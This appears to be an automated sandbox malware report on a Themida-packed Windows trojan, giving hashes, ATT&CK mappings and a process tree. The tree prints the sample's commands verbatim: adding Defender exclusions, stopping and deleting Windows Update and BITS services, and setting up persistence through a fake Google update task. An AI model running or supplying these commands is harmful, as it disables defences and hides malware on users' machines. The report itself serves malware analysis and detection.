85569470b1bacc8146eb41de3e46cefd826a13cac3f97e5a5ca65ec14be5ec5c

Analysis

max time kernel
30s
max time network
35s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
20/10/2022, 00:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

mmm.exe
Size

6.9MB
MD5

c2b5692d7461c63215d8d13031094e1a
SHA1

383c835bbc904152fedb7910d2028d518278d578
SHA256

85569470b1bacc8146eb41de3e46cefd826a13cac3f97e5a5ca65ec14be5ec5c
SHA512

b89eeff2ecec12d3243266fce3ee2dd1c766e4bbbad6067d453b65d276b6d7ef2f18116703b4546399f7430ffe49c83e526d216c4b842c3c69bd4bf0f052c14f
SSDEEP

196608:MrAev3AuJzPokWeb+loYC4uzHD/N6arTdeS/4mzlWc6L:SlBPoeeSbN6and3/4cH6L

Score

10^/10

evasion themida trojan

Malware Config

Signatures

Modifies security service 2 TTPs 5 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters	reg.exe

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	mmm.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	updater.exe

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File created	C:\Windows\system32\drivers\etc\hosts	mmm.exe

Executes dropped EXE 1 IoCs

pid	Process
2628	updater.exe

Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

Checks BIOS information in registry 2 TTPs 4 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	updater.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	updater.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	mmm.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	mmm.exe

Themida packer 13 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral2/memory/4928-132-0x00007FF74BD00000-0x00007FF74C999000-memory.dmp	themida
behavioral2/memory/4928-133-0x00007FF74BD00000-0x00007FF74C999000-memory.dmp	themida
behavioral2/memory/4928-135-0x00007FF74BD00000-0x00007FF74C999000-memory.dmp	themida
behavioral2/memory/4928-136-0x00007FF74BD00000-0x00007FF74C999000-memory.dmp	themida
behavioral2/memory/4928-137-0x00007FF74BD00000-0x00007FF74C999000-memory.dmp	themida
behavioral2/memory/4928-138-0x00007FF74BD00000-0x00007FF74C999000-memory.dmp	themida
behavioral2/memory/4928-139-0x00007FF74BD00000-0x00007FF74C999000-memory.dmp	themida
behavioral2/memory/4928-167-0x00007FF74BD00000-0x00007FF74C999000-memory.dmp	themida
behavioral2/files/0x0008000000022f72-172.dat	themida
behavioral2/memory/2628-173-0x00007FF7F1E00000-0x00007FF7F2A99000-memory.dmp	themida
behavioral2/memory/2628-175-0x00007FF7F1E00000-0x00007FF7F2A99000-memory.dmp	themida
behavioral2/memory/2628-177-0x00007FF7F1E00000-0x00007FF7F2A99000-memory.dmp	themida
behavioral2/memory/2628-178-0x00007FF7F1E00000-0x00007FF7F2A99000-memory.dmp	themida

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	mmm.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	updater.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
4928	mmm.exe
2628	updater.exe

Drops file in Program Files directory 1 IoCs

description	ioc	Process
File created	C:\Program Files\Google\Chrome\updater.exe	mmm.exe

Launches sc.exe 5 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1608	sc.exe
3984	sc.exe
3980	sc.exe
1260	sc.exe
5084	sc.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
4148	powershell.exe
4148	powershell.exe
3520	powershell.exe
3520	powershell.exe
2736	powershell.exe
2736	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4148	powershell.exe
Token: SeDebugPrivilege	3520	powershell.exe
Token: SeShutdownPrivilege	4720	powercfg.exe
Token: SeCreatePagefilePrivilege	4720	powercfg.exe
Token: SeShutdownPrivilege	4124	powercfg.exe
Token: SeCreatePagefilePrivilege	4124	powercfg.exe
Token: SeShutdownPrivilege	5076	powercfg.exe
Token: SeCreatePagefilePrivilege	5076	powercfg.exe
Token: SeShutdownPrivilege	4172	powercfg.exe
Token: SeCreatePagefilePrivilege	4172	powercfg.exe
Token: SeIncreaseQuotaPrivilege	3520	powershell.exe
Token: SeSecurityPrivilege	3520	powershell.exe
Token: SeTakeOwnershipPrivilege	3520	powershell.exe
Token: SeLoadDriverPrivilege	3520	powershell.exe
Token: SeSystemProfilePrivilege	3520	powershell.exe
Token: SeSystemtimePrivilege	3520	powershell.exe
Token: SeProfSingleProcessPrivilege	3520	powershell.exe
Token: SeIncBasePriorityPrivilege	3520	powershell.exe
Token: SeCreatePagefilePrivilege	3520	powershell.exe
Token: SeBackupPrivilege	3520	powershell.exe
Token: SeRestorePrivilege	3520	powershell.exe
Token: SeShutdownPrivilege	3520	powershell.exe
Token: SeDebugPrivilege	3520	powershell.exe
Token: SeSystemEnvironmentPrivilege	3520	powershell.exe
Token: SeRemoteShutdownPrivilege	3520	powershell.exe
Token: SeUndockPrivilege	3520	powershell.exe
Token: SeManageVolumePrivilege	3520	powershell.exe
Token: 33	3520	powershell.exe
Token: 34	3520	powershell.exe
Token: 35	3520	powershell.exe
Token: 36	3520	powershell.exe
Token: SeIncreaseQuotaPrivilege	3520	powershell.exe
Token: SeSecurityPrivilege	3520	powershell.exe
Token: SeTakeOwnershipPrivilege	3520	powershell.exe
Token: SeLoadDriverPrivilege	3520	powershell.exe
Token: SeSystemProfilePrivilege	3520	powershell.exe
Token: SeSystemtimePrivilege	3520	powershell.exe
Token: SeProfSingleProcessPrivilege	3520	powershell.exe
Token: SeIncBasePriorityPrivilege	3520	powershell.exe
Token: SeCreatePagefilePrivilege	3520	powershell.exe
Token: SeBackupPrivilege	3520	powershell.exe
Token: SeRestorePrivilege	3520	powershell.exe
Token: SeShutdownPrivilege	3520	powershell.exe
Token: SeDebugPrivilege	3520	powershell.exe
Token: SeSystemEnvironmentPrivilege	3520	powershell.exe
Token: SeRemoteShutdownPrivilege	3520	powershell.exe
Token: SeUndockPrivilege	3520	powershell.exe
Token: SeManageVolumePrivilege	3520	powershell.exe
Token: 33	3520	powershell.exe
Token: 34	3520	powershell.exe
Token: 35	3520	powershell.exe
Token: 36	3520	powershell.exe
Token: SeIncreaseQuotaPrivilege	3520	powershell.exe
Token: SeSecurityPrivilege	3520	powershell.exe
Token: SeTakeOwnershipPrivilege	3520	powershell.exe
Token: SeLoadDriverPrivilege	3520	powershell.exe
Token: SeSystemProfilePrivilege	3520	powershell.exe
Token: SeSystemtimePrivilege	3520	powershell.exe
Token: SeProfSingleProcessPrivilege	3520	powershell.exe
Token: SeIncBasePriorityPrivilege	3520	powershell.exe
Token: SeCreatePagefilePrivilege	3520	powershell.exe
Token: SeBackupPrivilege	3520	powershell.exe
Token: SeRestorePrivilege	3520	powershell.exe
Token: SeShutdownPrivilege	3520	powershell.exe

Suspicious use of WriteProcessMemory 40 IoCs

description	pid	Process	procid_target
PID 4928 wrote to memory of 4148	4928	mmm.exe	82
PID 4928 wrote to memory of 4148	4928	mmm.exe	82
PID 4928 wrote to memory of 4112	4928	mmm.exe	84
PID 4928 wrote to memory of 4112	4928	mmm.exe	84
PID 4928 wrote to memory of 2568	4928	mmm.exe	86
PID 4928 wrote to memory of 2568	4928	mmm.exe	86
PID 4928 wrote to memory of 3520	4928	mmm.exe	88
PID 4928 wrote to memory of 3520	4928	mmm.exe	88
PID 4112 wrote to memory of 3984	4112	cmd.exe	90
PID 4112 wrote to memory of 3984	4112	cmd.exe	90
PID 2568 wrote to memory of 4720	2568	cmd.exe	91
PID 2568 wrote to memory of 4720	2568	cmd.exe	91
PID 4112 wrote to memory of 3980	4112	cmd.exe	92
PID 4112 wrote to memory of 3980	4112	cmd.exe	92
PID 4112 wrote to memory of 1260	4112	cmd.exe	93
PID 4112 wrote to memory of 1260	4112	cmd.exe	93
PID 2568 wrote to memory of 4124	2568	cmd.exe	94
PID 2568 wrote to memory of 4124	2568	cmd.exe	94
PID 4112 wrote to memory of 5084	4112	cmd.exe	95
PID 4112 wrote to memory of 5084	4112	cmd.exe	95
PID 2568 wrote to memory of 5076	2568	cmd.exe	96
PID 2568 wrote to memory of 5076	2568	cmd.exe	96
PID 4112 wrote to memory of 1608	4112	cmd.exe	97
PID 4112 wrote to memory of 1608	4112	cmd.exe	97
PID 2568 wrote to memory of 4172	2568	cmd.exe	98
PID 2568 wrote to memory of 4172	2568	cmd.exe	98
PID 4112 wrote to memory of 3336	4112	cmd.exe	99
PID 4112 wrote to memory of 3336	4112	cmd.exe	99
PID 4112 wrote to memory of 5012	4112	cmd.exe	100
PID 4112 wrote to memory of 5012	4112	cmd.exe	100
PID 4112 wrote to memory of 2588	4112	cmd.exe	101
PID 4112 wrote to memory of 2588	4112	cmd.exe	101
PID 4112 wrote to memory of 2324	4112	cmd.exe	102
PID 4112 wrote to memory of 2324	4112	cmd.exe	102
PID 4112 wrote to memory of 3992	4112	cmd.exe	103
PID 4112 wrote to memory of 3992	4112	cmd.exe	103
PID 4928 wrote to memory of 2736	4928	mmm.exe	104
PID 4928 wrote to memory of 2736	4928	mmm.exe	104
PID 2736 wrote to memory of 3140	2736	powershell.exe	106
PID 2736 wrote to memory of 3140	2736	powershell.exe	106

C:\Users\Admin\AppData\Local\Temp\mmm.exe
"C:\Users\Admin\AppData\Local\Temp\mmm.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Drops file in Drivers directory
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:4928
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4148
- C:\Windows\SYSTEM32\cmd.exe
  cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4112
- - C:\Windows\system32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:3984
- - C:\Windows\system32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:3980
- - C:\Windows\system32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:1260
- - C:\Windows\system32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:5084
- - C:\Windows\system32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:1608
- - C:\Windows\system32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
    3⤵
    PID:3336
- - C:\Windows\system32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
    3⤵
    PID:5012
- - C:\Windows\system32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
    3⤵
    - Modifies security service
    PID:2588
- - C:\Windows\system32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
    3⤵
    PID:2324
- - C:\Windows\system32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    3⤵
    PID:3992
- C:\Windows\SYSTEM32\cmd.exe
  cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2568
- - C:\Windows\system32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4720
- - C:\Windows\system32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4124
- - C:\Windows\system32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:5076
- - C:\Windows\system32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4172
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell <#cthbhmckn#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3520
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell <#iljoca#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:2736
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
    3⤵
    PID:3140

C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2628

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Google\Chrome\updater.exe

Filesize
6.9MB

MD5
857ea6abaf260e78e4396110ceb903be

SHA1
5210aaffc8e75bed7fdb5d2be9da25c55ddbf4b7

SHA256
cc73d70b23b65638dd4cd75dbe6bc437dc34a197fea77da8893ff0fd7f0a4984

SHA512
3988f0d1faec2d02fcb60f9a5a5aa47da06b5c83fa03e5291459f79e79e12b0d948aee22052f139b9aa03e3f45219354240305e543b69276d28875dc3983df6e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
cb3a799921d48256ab45414af88b0aa8

SHA1
8888fb5656f5f11576c0fbc3ba45d7df56000d28

SHA256
5ad60a0e324106c6b5a8a7c41b4eac83234ed53cf26025dd4d63c0750b265105

SHA512
21b53b49d0f95cb600444b15a274c31d9374ae96dc2ab464e6ada96bae11f1000e92f6f51f62e5b91891dbbb30e6ab9c71006a9a166b8d4ae24457dcd7efdf69

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
873f212660165179cecf3fcfdd5ed627

SHA1
885aed28e330d7d370d1fd9b03b6a4ef8e09b8d9

SHA256
2890c20f0dc234e426bad228b177973b5057caf9179c938461987289beaff517

SHA512
4b6083f815727080eb904ce31127ef908091ede6a71a02e0b0a55291fd5f75a1202b997111461c6913b3afadb32a90ac6c7c43c098e3aa92ceedc3f9cfdf74ef

Download Submit
memory/2628-175-0x00007FF7F1E00000-0x00007FF7F2A99000-memory.dmp

Filesize
12.6MB

Download
memory/2628-173-0x00007FF7F1E00000-0x00007FF7F2A99000-memory.dmp

Filesize
12.6MB

Download
memory/2628-176-0x00007FFAB2090000-0x00007FFAB2285000-memory.dmp

Filesize
2.0MB

Download
memory/2628-177-0x00007FF7F1E00000-0x00007FF7F2A99000-memory.dmp

Filesize
12.6MB

Download
memory/2628-178-0x00007FF7F1E00000-0x00007FF7F2A99000-memory.dmp

Filesize
12.6MB

Download
memory/2736-170-0x00007FFA94040000-0x00007FFA94B01000-memory.dmp

Filesize
10.8MB

Download
memory/2736-174-0x00007FFA94040000-0x00007FFA94B01000-memory.dmp

Filesize
10.8MB

Download
memory/3520-165-0x00007FFA93D10000-0x00007FFA947D1000-memory.dmp

Filesize
10.8MB

Download
memory/3520-161-0x00007FFA93D10000-0x00007FFA947D1000-memory.dmp

Filesize
10.8MB

Download
memory/4148-143-0x00007FFA93D10000-0x00007FFA947D1000-memory.dmp

Filesize
10.8MB

Download
memory/4148-144-0x00007FFA93D10000-0x00007FFA947D1000-memory.dmp

Filesize
10.8MB

Download
memory/4148-142-0x000001E846E20000-0x000001E846E42000-memory.dmp

Filesize
136KB

Download
memory/4928-139-0x00007FF74BD00000-0x00007FF74C999000-memory.dmp

Filesize
12.6MB

Download
memory/4928-135-0x00007FF74BD00000-0x00007FF74C999000-memory.dmp

Filesize
12.6MB

Download
memory/4928-167-0x00007FF74BD00000-0x00007FF74C999000-memory.dmp

Filesize
12.6MB

Download
memory/4928-168-0x00007FFAB2090000-0x00007FFAB2285000-memory.dmp

Filesize
2.0MB

Download
memory/4928-133-0x00007FF74BD00000-0x00007FF74C999000-memory.dmp

Filesize
12.6MB

Download
memory/4928-134-0x00007FFAB2090000-0x00007FFAB2285000-memory.dmp

Filesize
2.0MB

Download
memory/4928-140-0x00007FFAB2090000-0x00007FFAB2285000-memory.dmp

Filesize
2.0MB

Download
memory/4928-132-0x00007FF74BD00000-0x00007FF74C999000-memory.dmp

Filesize
12.6MB

Download
memory/4928-138-0x00007FF74BD00000-0x00007FF74C999000-memory.dmp

Filesize
12.6MB

Download
memory/4928-137-0x00007FF74BD00000-0x00007FF74C999000-memory.dmp

Filesize
12.6MB

Download
memory/4928-136-0x00007FF74BD00000-0x00007FF74C999000-memory.dmp

Filesize
12.6MB

Download